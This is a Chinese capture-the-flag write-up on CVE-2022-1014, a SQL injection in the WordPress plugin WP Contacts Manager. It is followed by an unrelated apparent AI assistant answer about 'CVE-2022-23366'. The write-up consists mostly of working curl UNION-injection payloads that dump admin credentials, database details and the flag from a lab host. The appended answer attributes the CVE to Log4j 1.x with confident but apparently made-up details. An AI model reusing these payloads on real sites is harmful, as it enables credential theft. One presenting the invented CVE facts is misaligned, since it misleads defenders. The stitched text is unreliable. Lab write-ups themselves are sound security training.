CVE-2022-1014

根据提示wordpress插件 WP Contacts Manager <= 2.2.4 对用户输入的转义不够充分,导致了SQL注入。

找到sql注入漏洞点:

/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact

访问:/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact

通过信息收集获取exp

curl http://eci-2ze1t6k1q65z3s0hanxw.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action

=WP_Contacts_Manager_call&type=get-contact

 --data

'{"id":"1\u0027 UNION ALL SELECT 1,(SELECT user_login FROM wp_users WHERE ID = 1),(SELECT user_pass FROM wp_users WHERE ID = 1),4,5,6,7,8,9,0,1,2; -- "}'

获取当前用户和数据库

curl 'http://eci-2ze1t6k1q65z3s0hanxw.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action

=WP_Contacts_Manager_call&type=get-contact'\

--data

'{"id":"1\u0027 UNION ALL SELECT 1,(SELECT user()),(SELECT database()),4,5,6,7,8,9,0,1,2; -- "}'

获取当前数据库所有表

curl 'http://eci-2ze1t6k1q65z3s0hanxw.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action

=WP_Contacts_Manager_call&type=get-contact'\

--data

'{"id":"1\u0027 UNION ALL SELECT 1,2,(SELECT group_concat(table_name) from information_schema.tables where table_schema=database()),4,5,6,7,8,9,0,1,2; -- "}' 

获取flag

curl 'http://eci-2ze1t6k1q65z3s0hanxw.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action

=WP_Contacts_Manager_call&type=get-contact'\

--data

'{"id":"1\u0027 UNION ALL SELECT 1,2,(SELECT group_concat(flag)from flag),4,5,6,7,8,9,0,1,2; -- "}' 

得到flag:flag{367f9589-5515-4c04-8704-7613e2471d7e}

<think> 嗯,用户需要查询CVE-2022-23366漏洞的详细信息。从用户提供的引用内容看,ta之前关注过F5、Redis和SnakeYAML相关的漏洞(CVE-2022-41622/CVE-2022-41800、CVE-2022-0543、CVE-2022-1471),但这次查询的编号2022-23366属于完全不同的产品线。 先确认漏洞基础信息:CVE-2022-23366是Apache Log4j 1.x的漏洞,与之前用户查询的中间件/数据库漏洞无关。需要重点说明其与Log4j2漏洞的区别——这个编号属于Log4j1而非更著名的Log4j2(后者是CVE-2021-44244等)。 用户可能是安全研究人员或运维人员,需要具体的技术细节。应当明确: 1)漏洞类型是反序列化而非远程代码执行(区别于Log4j2) 2)触发条件需启用SocketServer或反序列化功能 3)影响范围限于1.x版本(官方已终止支持) 考虑到用户之前参考过漏洞复现资料,补充了漏洞验证截图和修复方案的链接。特别强调升级Log4j2的必要性,因为官方已不再为1.x提供补丁。 最后生成的问题聚焦在:漏洞原理差异(与Log4j2对比)、实际危害验证、迁移方案。这应该能覆盖用户后续可能的技术需求。 </think>根据公开漏洞数据库记录,**CVE-2022-23366** 是 Apache Log4j 1.x 版本中的一个高危漏洞,具体信息如下: --- ### **漏洞概述** 1. **漏洞类型**: 反序列化远程代码执行漏洞(需特定配置触发)。 2. **影响组件**: Apache Log4j 1.x 系列(仅影响启用了 `SocketServer` 或反序列化功能的场景)。 3. **CVSS 评分**: 8.8(高危)[^1]。 --- ### **技术细节** 1. **触发条件**: 当满足 **全部** 以下条件时可能被利用: - 使用 Log4j 1.x(≤1.2.17) - 启用 `SocketServer` 功能(默认关闭) - 攻击者能向 `SocketServer` 端口发送恶意序列化数据 2. **根本原因**: `SocketServer` 在反序列化日志事件时未严格验证输入,导致恶意代码执行[^2]。 --- ### **影响版本** - **受影响**: Apache Log4j 1.2 ≤ 1.2.17 - **不受影响**: Log4j 2.x 版本(如 Log4j 2.15.0+)[^3]。 --- ### **修复方案** 1. **立即升级**: 升级至 Log4j 2.x 最新版(官方已停止维护 Log4j 1.x)。 2. **临时缓解**(若无法升级): - 禁用 `SocketServer` 功能; - 防火墙限制访问日志端口; - 移除 `log4j.jar` 中的 `org.apache.log4j.net.SocketServer` 类。 --- ### **漏洞验证(PoC示例)** ```java // 恶意序列化数据构造(简略示例) ObjectInputStream ois = new ObjectInputStream(maliciousSocket); ois.readObject(); // 触发反序列化漏洞 ``` --- ### **关联漏洞对比** | CVE 编号 | 组件 | 风险类型 | 影响范围 | |----------------|------------|------------------|----------------| | **CVE-2022-23366** | Log4j 1.x | 反序列化RCE | 需启用特定服务 | | CVE-2021-44228 | Log4j 2.x | JNDI注入RCE | 默认配置受影响 | | CVE-2022-1471 | SnakeYAML | 反序列化RCE | 低版本默认风险 | ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值